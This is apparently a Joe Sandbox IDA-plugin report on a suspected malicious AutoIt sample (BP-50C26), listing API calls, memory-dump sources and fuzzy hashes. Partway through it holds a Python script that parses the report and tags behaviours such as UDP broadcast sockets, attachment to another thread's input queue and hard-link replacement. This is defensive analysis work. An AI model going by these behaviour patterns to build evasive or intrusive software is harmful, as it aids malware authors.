                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                      • String ID: msctls_updown32
                                                                                      • API String ID: 4014797782-2298589950
                                                                                      • Opcode ID: 6a0efa6eb90c4af59000b72789fab19e8329d80d0f338ac247f84b64903a538a
                                                                                      • Instruction ID: e1aea0e555df983eae506241229a44350f5d1eb0e008af96056286ec76757be4
                                                                                      • Opcode Fuzzy Hash: 6a0efa6eb90c4af59000b72789fab19e8329d80d0f338ac247f84b64903a538a
                                                                                      • Instruction Fuzzy Hash: 38214FB5600245AFDB14DF68DCC1EAB37ADEB8B3A8B040059FA109B261DB70ED51DB60
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                      • API String ID: 176396367-2734436370
                                                                                      • Opcode ID: f047cb013a3c8485bb077b11ccf7486617a25cd245f2d00f595f51d9e69e0a31
                                                                                      • Instruction ID: c2ea28e91db22af7f4fcb748357ffb6975dda1308749e840ba750ca560612e14
                                                                                      • Opcode Fuzzy Hash: f047cb013a3c8485bb077b11ccf7486617a25cd245f2d00f595f51d9e69e0a31
                                                                                      • Instruction Fuzzy Hash: F0215B7210422166C371AB259C02FF773E8DF52314F10C13AF95D97181EB71AE86E2D5
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CA3840
                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CA3850
                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CA3876
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$MoveWindow
                                                                                      • String ID: Listbox
                                                                                      • API String ID: 3315199576-2633736733
                                                                                      • Opcode ID: c60cbb18111247e77ab5b07601fcda51528f1cf76cca9d2d47d17eea019c18ca
                                                                                      • Instruction ID: 17899ca5fa4353bf6f55f89fa64d045bd2458aa3816011b3a6176a9ddf4df162
                                                                                      • Opcode Fuzzy Hash: c60cbb18111247e77ab5b07601fcda51528f1cf76cca9d2d47d17eea019c18ca
                                                                                      • Instruction Fuzzy Hash: AC21C272600119BBEF218F54CC85FBB376EEF8A758F118125F9109B190CA75DD51C7A0
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C84A08
                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C84A5C
                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,00CACC08), ref: 00C84AD0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                      • String ID: %lu
                                                                                      • API String ID: 2507767853-685833217
                                                                                      • Opcode ID: 29d89d47d3cd080e038d853636290b10e3d0eb43b76d76e72d5b9f7d8af1dcd5
                                                                                      • Instruction ID: a557e7babadff5fc9092584acdd8de989e9fba5c85535b5ff865d84a37e55b50
                                                                                      • Opcode Fuzzy Hash: 29d89d47d3cd080e038d853636290b10e3d0eb43b76d76e72d5b9f7d8af1dcd5
                                                                                      • Instruction Fuzzy Hash: 36315E75A00109AFDB14DF54C885EAE7BF8EF09308F1480A9E909DB252DB71EE46DB61
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CA424F
                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CA4264
                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CA4271
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: msctls_trackbar32
                                                                                      • API String ID: 3850602802-1010561917
                                                                                      • Opcode ID: 5aa600152367356e2ede077d37cb59a075bda46441984a127acf3d50623a6aee
                                                                                      • Instruction ID: c3c91cd1fa7115da5232395447d35d21ac2e62a0257276e15e325f07cca1561f
                                                                                      • Opcode Fuzzy Hash: 5aa600152367356e2ede077d37cb59a075bda46441984a127acf3d50623a6aee
                                                                                      • Instruction Fuzzy Hash: E8110631240249BEEF205F69CC46FAB3BACEFC6B58F010224FA55E6090D6B1DC519B50
APIs
  • Part of subcall function 00C16B57: _wcslen.LIBCMT ref: 00C16B6A
  • Part of subcall function 00C72DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C72DC5
  • Part of subcall function 00C72DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C72DD6
  • Part of subcall function 00C72DA7: GetCurrentThreadId.KERNEL32 ref: 00C72DDD
  • Part of subcall function 00C72DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C72DE4
• GetFocus.USER32 ref: 00C72F78
  • Part of subcall function 00C72DEE: GetParent.USER32(00000000), ref: 00C72DF9
• GetClassNameW.USER32(?,?,00000100), ref: 00C72FC3
• EnumChildWindows.USER32(?,00C7303B), ref: 00C72FEB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
• String ID: %s%d
• API String ID: 1272988791-1110647743
• Opcode ID: 0902b07d11f373bd931e906b3052739578e2f31c172ed499bb9b0c5c44c16b84
• Instruction ID: 3fd97b0e481e9e01e0beb031794a31dcd94ebfad357d2da23b2bd66543bd663e
• Opcode Fuzzy Hash: 0902b07d11f373bd931e906b3052739578e2f31c172ed499bb9b0c5c44c16b84
• Instruction Fuzzy Hash: 2F11B471600205ABCF14BF708CC5FEE376AAF95314F048079F90D9B252DE309A45EB60
APIs
• GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00CA58C1
• SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00CA58EE
• DrawMenuBar.USER32(?), ref: 00CA58FD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: Menu$InfoItem$Draw
• String ID: 0
• API String ID: 3227129158-4108050209
• Opcode ID: c9e2dd35303e30ed4d8eea6d4aa7b83fa4a438673e710b89100838a3b0064001
• Instruction ID: 4f8fa94b027908ede11150ec3e534b7a28ecf11b31853a91f80b7293cfa3e2d8
• Opcode Fuzzy Hash: c9e2dd35303e30ed4d8eea6d4aa7b83fa4a438673e710b89100838a3b0064001
• Instruction Fuzzy Hash: E5015B31500219EEDB219F61EC44BAFBBB4FF46364F10C0A9F849DA151DB308A85EF21
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ede8fb18de77df23ab8ae2999d189d11258ceb8fc21b094576a4f3cd382b740b
• Instruction ID: bf810367d669ce40de15895ab143b7f237fefd1aca62a5aecf7d7ccc6cb716c3
• Opcode Fuzzy Hash: ede8fb18de77df23ab8ae2999d189d11258ceb8fc21b094576a4f3cd382b740b
• Instruction Fuzzy Hash: A6C14D75A00206EFDB14CFA4C898BAEB7B5FF48714F208598E519EB261D731DE81CB90
APIs
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: Variant$ClearInitInitializeUninitialize
• String ID:
• API String ID: 1998397398-0
• Opcode ID: 9d3b39a4d2367c6de04452ad24217a7a47eec79f8dd962e22c8342b6bb691be4
• Instruction ID: 0a880b63225cc5ee6db78206bd95c1f970449a4d0b578d38ecb71c05fdcef19f
• Opcode Fuzzy Hash: 9d3b39a4d2367c6de04452ad24217a7a47eec79f8dd962e22c8342b6bb691be4
• Instruction Fuzzy Hash: 40A15A752043009FCB10DF28C489A6AB7E5FF89714F048959F98A9B362DB30EE41DB92
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00CAFC08,?), ref: 00C705F0
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00CAFC08,?), ref: 00C70608
• CLSIDFromProgID.OLE32(?,?,00000000,00CACC40,000000FF,?,00000000,00000800,00000000,?,00CAFC08,?), ref: 00C7062D
• _memcmp.LIBVCRUNTIME ref: 00C7064E
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
• Opcode ID: 1dc8904b5addd2cbaa367bfdf1392314ab5e273fa1f4e327c85b6c2b746070d5
• Instruction ID: d2c11210e41d68fbecff97b9810cac46a5c31fa2006d8340d8b963adebdbb28d
• Opcode Fuzzy Hash: 1dc8904b5addd2cbaa367bfdf1392314ab5e273fa1f4e327c85b6c2b746070d5
• Instruction Fuzzy Hash: D3810971A00109EFCB04DF94C998EEEB7B9FF89315F208558F516AB250DB71AE46CB60
APIs
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 87c4556e3a89522d3ef0371576b45bc6402f4b76946a4a3a093a088fafe06fcd
• Instruction ID: 5aba925abd29f8beb4077d3c7ccf33ebe6c27fb98ab8e71e92c3c91ed112a8aa
• Opcode Fuzzy Hash: 87c4556e3a89522d3ef0371576b45bc6402f4b76946a4a3a093a088fafe06fcd
• Instruction Fuzzy Hash: BC413C39A00110ABDB216BBA9C4DBBF3AA4FF41371F1C0625FC29D6192E77489C56276
APIs
• GetWindowRect.USER32(0125DA38,?), ref: 00CA62E2
• ScreenToClient.USER32(?,?), ref: 00CA6315
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00CA6382
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
• Opcode ID: a97181196f1b3e8a26497a8d511912e8aadd9b1969062061d88956b25cfcd7a1
• Instruction ID: 7c5481b3c9d010ec1862a5c2c3e03ba74026578e7a048f2aab3d6e9a6eac37b5
• Opcode Fuzzy Hash: a97181196f1b3e8a26497a8d511912e8aadd9b1969062061d88956b25cfcd7a1
• Instruction Fuzzy Hash: 8951417490124AEFCF10DF54D880AAE7BB5FF56368F148259F9259B2A0D730EE51CB50
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00C91AFD
• WSAGetLastError.WSOCK32 ref: 00C91B0B
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C91B8A
• WSAGetLastError.WSOCK32 ref: 00C91B94
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: ErrorLast$socket
• String ID:
• API String ID: 1881357543-0
• Opcode ID: c054e288ad98910b18d739ad44aff3cf7201089b1f26e8c4f1f60a03a8841f86
• Instruction ID: 200a00f94d3c221fcf719407d7fbe7620feca400b7ee2ad86a27c9b7f1505161
• Opcode Fuzzy Hash: c054e288ad98910b18d739ad44aff3cf7201089b1f26e8c4f1f60a03a8841f86
• Instruction Fuzzy Hash: D641F5746002016FDB20AF24C88AF6977E1AB45708F54C448F9258F7D3D772ED82DB90
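The per-function "APIs" blocks above are the most useful part of the report for triage, but they are awkward to read by hand: ordinal imports such as "#21.WSOCK32" are left unresolved and constants are printed as raw hex. The script below is an added example, not Joe Sandbox code; it parses the bullet lines exactly as they appear on this page into one record per function, resolves WSOCK32 ordinals through a table taken from that DLL's export list (an assumption of this example, not something the report states), and tags a few call patterns visible in these records: a UDP socket with SO_BROADCAST (ordinal 21 is setsockopt; SOL_SOCKET is 0xFFFF and SO_BROADCAST is 0x20), AttachThreadInput paired with GetFocus, and CreateHardLinkW paired with DeleteFileW. The sample input is constructed from lines of this report.

```python
"""Parse the per-function 'APIs' records of a Joe Sandbox text export.

Added example (not Joe Sandbox code).  Works on the bullet lines as printed
in the report; everything it 'knows' beyond the text is marked as such.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# WinSock 1.1 ordinals of WSOCK32.DLL (from the DLL's export table, not from
# the report).  Only the ones relevant to socket triage are listed.
WSOCK32_ORDINALS = {
    3: "closesocket", 4: "connect", 12: "ioctlsocket", 16: "recv",
    17: "recvfrom", 19: "send", 20: "sendto", 21: "setsockopt", 23: "socket",
}

# Constants as the report prints them (8 hex digits).
IPPROTO_UDP = "00000011"      # 17
SOL_SOCKET = "0000FFFF"
SO_BROADCAST = "00000020"

# "• socket.WSOCK32(00000002,00000002,00000011), ref: 00C91AFD"
# "  • Part of subcall function 00C72DA7: GetFocus.USER32 ref: 00C72F78"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>#?\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# "• API ID: ErrorLast$socket", "• Instruction Fuzzy Hash: D641..."
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]          # '?' is kept where the plugin could not recover a value
    ref: str
    subcall_of: Optional[str] = None


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)


def resolve_ordinal(name: str, module: str) -> str:
    """'#21' in WSOCK32 -> 'setsockopt'; anything else is returned unchanged."""
    if name.startswith("#") and module.upper() == "WSOCK32":
        return WSOCK32_ORDINALS.get(int(name[1:]), name)
    return name


def parse_report(text: str) -> List[FunctionRecord]:
    """Group bullet lines into records; 'Instruction Fuzzy Hash' closes a record."""
    records: List[FunctionRecord] = []
    cur = FunctionRecord()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            cur.apis.append(ApiCall(resolve_ordinal(m["name"], m["mod"]),
                                    m["mod"], args, m["ref"], m["sub"]))
            continue
        f = FIELD_RE.match(line)
        if f:
            cur.fields[f["key"]] = f["val"].strip()
            if f["key"] == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FunctionRecord()
    return records


def triage(rec: FunctionRecord) -> Set[str]:
    """Behavioural tags derived only from the record's API list and arguments."""
    names = {a.name for a in rec.apis}
    tags: Set[str] = set()
    if {"AttachThreadInput", "GetFocus"} <= names:
        tags.add("attaches to another thread's input queue")
    if {"CreateHardLinkW", "DeleteFileW"} <= names:
        tags.add("creates/replaces a hard link")
    for a in rec.apis:
        if a.name == "socket" and len(a.args) >= 3 and a.args[2] == IPPROTO_UDP:
            tags.add("UDP socket")
        if a.name == "setsockopt" and a.args[1:3] == [SOL_SOCKET, SO_BROADCAST]:
            tags.add("SO_BROADCAST")
    return tags


# Constructed sample: three records copied from this report's APIs blocks.
SAMPLE = """\
APIs
  • Part of subcall function 00C16B57: _wcslen.LIBCMT ref: 00C16B6A
  • Part of subcall function 00C72DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C72DE4
• GetFocus.USER32 ref: 00C72F78
• GetClassNameW.USER32(?,?,00000100), ref: 00C72FC3
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
• Instruction Fuzzy Hash: 2F11B471600205ABCF14BF708CC5FEE376AAF95314F048079F90D9B252DE309A45EB60
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00C91AFD
• WSAGetLastError.WSOCK32 ref: 00C91B0B
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C91B8A
• WSAGetLastError.WSOCK32 ref: 00C91B94
• API ID: ErrorLast$socket
• Instruction Fuzzy Hash: D641F5746002016FDB20AF24C88AF6977E1AB45708F54C448F9258F7D3D772ED82DB90
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C85783
• GetLastError.KERNEL32(?,00000000), ref: 00C857A9
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C857CE
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C857FA
• API ID: CreateHardLink$DeleteErrorFileLast
• Instruction Fuzzy Hash: 48414F35600610DFCB11EF15C484A5DBBF2EF4A324B18C488E85A9B362CB70FD41EB91
"""


def summarize(text: str) -> List[Dict[str, object]]:
    """One dict per function: its API ID, the resolved call sequence and tags."""
    return [{"api_id": r.fields.get("API ID", ""),
             "calls": [a.name for a in r.apis],
             "tags": sorted(triage(r))} for r in parse_report(text)]


if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(row["api_id"], "->", row["tags"])
```

Feed it the whole text export rather than the sample and the fuzzy hashes in `fields` let you cluster identical runtime functions across samples; the AutoIt interpreter functions seen here will recur in any other compiled AutoIt binary, so tags that fire only on those are runtime noise, not the script's own behaviour.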
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c174c1ca4a87bc5859a5b10163de4c08073e2412e0b7d22c9d0a195126af4e80
• Instruction ID: 5c3bed0bbec07413a6630b1b4caa5487d81512a8c1155c84c4619ed77afa16c5
• Opcode Fuzzy Hash: c174c1ca4a87bc5859a5b10163de4c08073e2412e0b7d22c9d0a195126af4e80
• Instruction Fuzzy Hash: 32412475A00304AFD7259F38CC46BAABBE9FB88720F10852EF515DB282D371DE419790
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C85783
• GetLastError.KERNEL32(?,00000000), ref: 00C857A9
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C857CE
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C857FA
Memory Dump Source
• Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: b745f6ecd1ce92455132ba17ead7a92a9a90db42cdbb7110dc79fb12ff503a22
• Instruction ID: b62ff9f39496fa147d669e71d7d45dc89315c49291536f1921365bbb27e3fcce
• Opcode Fuzzy Hash: b745f6ecd1ce92455132ba17ead7a92a9a90db42cdbb7110dc79fb12ff503a22
• Instruction Fuzzy Hash: 48414F35600610DFCB11EF15C484A5DBBF2EF4A324B18C488E85A9B362CB70FD41EB91
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00C36D71,00000000,00000000,00C382D9,?,00C382D9,?,00000001,00C36D71,8BE85006,00000001,00C382D9,00C382D9), ref: 00C4D910
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C4D999
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00C4D9AB
• __freea.LIBCMT ref: 00C4D9B4
  • Part of subcall function 00C43820: RtlAllocateHeap.NTDLL(00000000,?,00CE1444,?,00C2FDF5,?,?,00C1A976,00000010,00CE1440,00C113FC,?,00C113C6,?,00C11129), ref: 00C43852
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
